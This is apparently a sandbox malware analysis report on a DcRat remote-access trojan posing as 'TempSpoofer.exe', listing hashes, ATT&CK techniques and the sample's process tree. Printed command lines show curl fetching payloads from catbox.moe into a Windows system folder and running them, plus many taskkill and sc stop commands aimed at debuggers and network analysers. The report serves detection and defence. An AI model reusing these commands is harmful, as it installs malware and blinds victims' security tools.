dcrat | 550b6cbdefab0c183b41f9fa96c8ed0797efaf13081fd6ca745f30670d8725f0

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2024 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TempSpoofer.exe
Size

80KB
MD5

5374b62745b86ac86e6a4c89921182cd
SHA1

921a4a2d5c6489bc5a0b5697bf19678495dfadbf
SHA256

550b6cbdefab0c183b41f9fa96c8ed0797efaf13081fd6ca745f30670d8725f0
SHA512

e56cb7ebd3be67e94776043f885412e5f42cfc0c258fe9a2f2fe3dd79f115b0416f64df5cfc82fa275ada0787224ece1400a86bd9567f6e014361ef87082461f
SSDEEP

1536:brvp14xgT6UellETcCMUlzLCYzha6a2UWwZyeMcxV6MFae:bbVjnTcCMUZLZBUWwZhMcCMFa

Score

10^/10

dcrat discovery evasion execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4816	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4512	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4972	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4212	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1136	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1120	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	8	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4600	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3756	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3608	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4700	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3676	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1300	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2600	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	924	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2424	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1556	552	schtasks.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1732	552	schtasks.exe	88

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2768	powershell.exe
1708	powershell.exe
4136	powershell.exe
872	powershell.exe
2332	powershell.exe
3556	powershell.exe

Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	TempSpoofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	physmeme.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	Medal.exe

Executes dropped EXE 4 IoCs

pid	Process
4892	physmeme.exe
696	physmeme.exe
1880	Medal.exe
2760	Medal.exe

Loads dropped DLL 1 IoCs

pid	Process
4892	physmeme.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4892 set thread context of 5000	4892	physmeme.exe	131

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\sysmon.exe	Medal.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\121e5b5079f7c0	Medal.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Speech\physmeme.exe	curl.exe
File opened for modification	C:\Windows\Speech\physmeme.exe	curl.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3168	sc.exe
1208	sc.exe
264	sc.exe
3400	sc.exe
1132	sc.exe
1140	sc.exe
3704	sc.exe
2236	sc.exe
1984	sc.exe
208	sc.exe
2020	sc.exe
4696	sc.exe
5092	sc.exe
4372	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
760	4892	WerFault.exe	123

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	physmeme.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4788	PING.EXE

Kills process with taskkill 26 IoCs

evasion

pid	Process
4660	taskkill.exe
4004	taskkill.exe
4900	taskkill.exe
4456	taskkill.exe
5032	taskkill.exe
2748	taskkill.exe
4792	taskkill.exe
2272	taskkill.exe
2728	taskkill.exe
3424	taskkill.exe
2000	taskkill.exe
5084	taskkill.exe
2364	taskkill.exe
1548	taskkill.exe
2604	taskkill.exe
1748	taskkill.exe
1752	taskkill.exe
3756	taskkill.exe
2168	taskkill.exe
3416	taskkill.exe
4684	taskkill.exe
3132	taskkill.exe
3560	taskkill.exe
244	taskkill.exe
2260	taskkill.exe
5108	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	physmeme.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	Medal.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4788	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3608	schtasks.exe
2600	schtasks.exe
2424	schtasks.exe
4600	schtasks.exe
1120	schtasks.exe
8	schtasks.exe
4700	schtasks.exe
3676	schtasks.exe
924	schtasks.exe
4816	schtasks.exe
4212	schtasks.exe
1136	schtasks.exe
1300	schtasks.exe
4972	schtasks.exe
3756	schtasks.exe
1556	schtasks.exe
1732	schtasks.exe
4512	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe
1484	TempSpoofer.exe

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeDebugPrivilege	3416	taskkill.exe
Token: SeDebugPrivilege	1548	taskkill.exe
Token: SeDebugPrivilege	2748	taskkill.exe
Token: SeDebugPrivilege	2604	taskkill.exe
Token: SeDebugPrivilege	2272	taskkill.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeDebugPrivilege	3424	taskkill.exe
Token: SeDebugPrivilege	2000	taskkill.exe
Token: SeDebugPrivilege	4684	taskkill.exe
Token: SeDebugPrivilege	2260	taskkill.exe
Token: SeDebugPrivilege	5108	taskkill.exe
Token: SeDebugPrivilege	4792	taskkill.exe
Token: SeDebugPrivilege	4660	taskkill.exe
Token: SeDebugPrivilege	5084	taskkill.exe
Token: SeDebugPrivilege	4004	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	3132	taskkill.exe
Token: SeDebugPrivilege	4900	taskkill.exe
Token: SeDebugPrivilege	3560	taskkill.exe
Token: SeDebugPrivilege	1748	taskkill.exe
Token: SeDebugPrivilege	3756	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	244	taskkill.exe
Token: SeDebugPrivilege	4456	taskkill.exe
Token: SeDebugPrivilege	5032	taskkill.exe
Token: SeDebugPrivilege	2168	taskkill.exe
Token: SeDebugPrivilege	1880	Medal.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeDebugPrivilege	2332	powershell.exe
Token: SeDebugPrivilege	2760	Medal.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1484 wrote to memory of 2284	1484	TempSpoofer.exe	84
PID 1484 wrote to memory of 2284	1484	TempSpoofer.exe	84
PID 1484 wrote to memory of 4332	1484	TempSpoofer.exe	85
PID 1484 wrote to memory of 4332	1484	TempSpoofer.exe	85
PID 2284 wrote to memory of 3416	2284	cmd.exe	86
PID 2284 wrote to memory of 3416	2284	cmd.exe	86
PID 4332 wrote to memory of 116	4332	cmd.exe	87
PID 4332 wrote to memory of 116	4332	cmd.exe	87
PID 1484 wrote to memory of 3720	1484	TempSpoofer.exe	89
PID 1484 wrote to memory of 3720	1484	TempSpoofer.exe	89
PID 3720 wrote to memory of 1548	3720	cmd.exe	90
PID 3720 wrote to memory of 1548	3720	cmd.exe	90
PID 1484 wrote to memory of 1984	1484	TempSpoofer.exe	91
PID 1484 wrote to memory of 1984	1484	TempSpoofer.exe	91
PID 1984 wrote to memory of 4372	1984	cmd.exe	92
PID 1984 wrote to memory of 4372	1984	cmd.exe	92
PID 1484 wrote to memory of 4036	1484	TempSpoofer.exe	93
PID 1484 wrote to memory of 4036	1484	TempSpoofer.exe	93
PID 4036 wrote to memory of 2748	4036	cmd.exe	94
PID 4036 wrote to memory of 2748	4036	cmd.exe	94
PID 1484 wrote to memory of 100	1484	TempSpoofer.exe	95
PID 1484 wrote to memory of 100	1484	TempSpoofer.exe	95
PID 100 wrote to memory of 2604	100	cmd.exe	96
PID 100 wrote to memory of 2604	100	cmd.exe	96
PID 1484 wrote to memory of 4128	1484	TempSpoofer.exe	97
PID 1484 wrote to memory of 4128	1484	TempSpoofer.exe	97
PID 4128 wrote to memory of 2272	4128	cmd.exe	98
PID 4128 wrote to memory of 2272	4128	cmd.exe	98
PID 1484 wrote to memory of 3052	1484	TempSpoofer.exe	99
PID 1484 wrote to memory of 3052	1484	TempSpoofer.exe	99
PID 3052 wrote to memory of 2728	3052	cmd.exe	100
PID 3052 wrote to memory of 2728	3052	cmd.exe	100
PID 1484 wrote to memory of 3668	1484	TempSpoofer.exe	101
PID 1484 wrote to memory of 3668	1484	TempSpoofer.exe	101
PID 3668 wrote to memory of 3424	3668	cmd.exe	102
PID 3668 wrote to memory of 3424	3668	cmd.exe	102
PID 1484 wrote to memory of 2088	1484	TempSpoofer.exe	103
PID 1484 wrote to memory of 2088	1484	TempSpoofer.exe	103
PID 2088 wrote to memory of 2000	2088	cmd.exe	104
PID 2088 wrote to memory of 2000	2088	cmd.exe	104
PID 1484 wrote to memory of 4920	1484	TempSpoofer.exe	105
PID 1484 wrote to memory of 4920	1484	TempSpoofer.exe	105
PID 4920 wrote to memory of 4684	4920	cmd.exe	106
PID 4920 wrote to memory of 4684	4920	cmd.exe	106
PID 1484 wrote to memory of 2980	1484	TempSpoofer.exe	107
PID 1484 wrote to memory of 2980	1484	TempSpoofer.exe	107
PID 2980 wrote to memory of 2260	2980	cmd.exe	108
PID 2980 wrote to memory of 2260	2980	cmd.exe	108
PID 1484 wrote to memory of 4080	1484	TempSpoofer.exe	109
PID 1484 wrote to memory of 4080	1484	TempSpoofer.exe	109
PID 4080 wrote to memory of 5108	4080	cmd.exe	110
PID 4080 wrote to memory of 5108	4080	cmd.exe	110
PID 1484 wrote to memory of 3540	1484	TempSpoofer.exe	111
PID 1484 wrote to memory of 3540	1484	TempSpoofer.exe	111
PID 3540 wrote to memory of 4792	3540	cmd.exe	112
PID 3540 wrote to memory of 4792	3540	cmd.exe	112
PID 1484 wrote to memory of 1968	1484	TempSpoofer.exe	113
PID 1484 wrote to memory of 1968	1484	TempSpoofer.exe	113
PID 1968 wrote to memory of 4660	1968	cmd.exe	114
PID 1968 wrote to memory of 4660	1968	cmd.exe	114
PID 1484 wrote to memory of 5072	1484	TempSpoofer.exe	115
PID 1484 wrote to memory of 5072	1484	TempSpoofer.exe	115
PID 5072 wrote to memory of 2236	5072	cmd.exe	116
PID 5072 wrote to memory of 2236	5072	cmd.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\TempSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\TempSpoofer.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2284
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4332
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/sx1s7p.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4036
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:100
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4128
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3668
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2088
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2980
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4080
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3540
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1968
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:2036
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    - Launches sc.exe
    PID:1132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:3528
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:1912
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:1140
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:4892
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5000
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 956
    3⤵
    - Program crash
    PID:760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:3308
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    - Launches sc.exe
    PID:3168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:4124
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:4696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:4668
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:4064
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2912
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3084
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3808
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1504
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4804
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1808
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4412
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq rawshark*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:228
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1716
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
  2⤵
  PID:1340
- - C:\Windows\system32\curl.exe
    curl --silent https://files.catbox.moe/acowqp.bin --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:3080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1732
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1772
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4308
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4372
